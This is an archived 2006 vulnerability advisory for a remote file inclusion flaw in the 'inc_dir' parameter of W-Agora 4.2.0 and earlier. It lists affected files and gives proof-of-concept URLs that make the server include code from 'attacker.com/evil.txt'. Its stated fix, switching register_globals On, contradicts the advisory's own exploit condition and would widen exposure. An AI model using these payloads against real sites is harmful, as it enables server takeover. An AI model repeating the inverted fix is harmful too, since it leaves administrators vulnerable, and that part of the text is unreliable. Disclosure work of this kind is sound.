TUCoPS :: Web :: CMS / Portals :: b06-3246.htm

W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion



ECHO.OR.ID=0D
ECHO_ADV_34$2006=0D
=0D
---------------------------------------------------------------------------------------------------=0D
[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir)  Remote File Inclusion=0D
---------------------------------------------------------------------------------------------------=0D
=0D
Author		: Dedi Dwianto a.k.a the_day=0D
Date Found	: June, 20th 2006=0D
Location	: Indonesia, Jakarta=0D
web		: http://advisories.echo.or.id/adv/adv34-theday-2006.txt=0D 
Critical Lvl	: Highly critical=0D
Impact		: System access=0D
Where		: From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
W-Agora (Web-Agora)=0D
=0D
Application	: W-Agora (Web-Agora)=0D
version		: <= 4.2.0=0D
URL		: http://w-agora.net=0D 
Description 	:=0D
=0D
W-Agora (Web-Agora) is a database-driven communications system which allows you and your visitors to store and =0D
display messages, files, and other information on your web site. More than "just another Web BBS/forum software", =0D
W-Agora is designed so it can be easily customizable through a Web browser and the use of templates.=0D
It can be used as a BBS, guestbook, download area, or publishing system. =0D
Several database backends are supported such as MySQL, Postgres, mSQL, Oracle and DBM.=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~~=0D
=0D
-----------------------insert.php----------------------=0D
....=0D
indexNotes();=0D
        }=0D
=0D
        ?>=0D
...=0D
----------------------------------------------------------=0D
=0D
Input passed to the "inc_dir" parameter in insert.php is not=0D
properly verified before being used. This can be exploited to execute=0D
arbitrary PHP code by including files from local or external=0D
resources=0D
=0D
Affected files: =0D
=0D
admin_notes.php=0D
admin_subscribed_user.php=0D
admin_user.php=0D
browse_avatar.php=0D
close.php=0D
create_forum.php=0D
create_site.php=0D
create_user.php=0D
delete.php=0D
delete_site.php=0D
download_forum.php=0D
editconf.php=0D
edit_site.php=0D
export.php=0D
forgot_password.php=0D
index.php=0D
insert.php=0D
search.php=0D
view.php=0D
update.php=0D
setup.php=0D
profile.php=0D
register.php=0D
rss.php=0D
list.php=0D
forgot_password.php=0D
include/mail.php=0D
include/fileupload.php=0D
include/msql.php=0D
include/dbaccess.php=0D
include/form.php=0D
include/postgres65.php=0D
include/postgres.php=0D
include/mysql.php=0D
extras/quicklist.php=0D
extras/shared_user.php=0D
user/ldap_example.php=0D
tools/upgrade_401.php=0D
tools/upgrade_402.php=0D
tools/upgrade_42.php=0D
tools/upgrade_site_401.php=0D
tools/upgrade_site_402.php=0D
=0D
Successful exploitation requires that "register_globals= Off ".=0D
=0D
Proof Of Concept:=0D
~~~~~~~~~~~~~~~~~=0D
=0D
http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt?=0D 
http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt?=0D 
http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt?=0D 
http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt?=0D 
http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt?=0D 
http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt?=0D 
http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt?=0D 
http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt?=0D 
http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt?=0D 
=0D
and more Affected files=0D
=0D
=0D
Solution:=0D
~~~~~~~~~=0D
Change register_globals= On =0D
in php.ini=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~~=0D
=0D
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten=0D
~ Lieur-Euy,Mr_ny3m,bithedz,an0maly=0D
~ newbie_hacker[at]yahoogroups.com=0D
~ #aikmel #e-c-h-o @irc.dal.net=0D 
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~~~=0D
=0D
     the_day || echo|staff || the_day[at]echo[dot]or[dot]id=0D
Homepage: http://theday.echo.or.id/=0D 
=0D
-------------------------------- [ EOF ] ----------------------------------=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH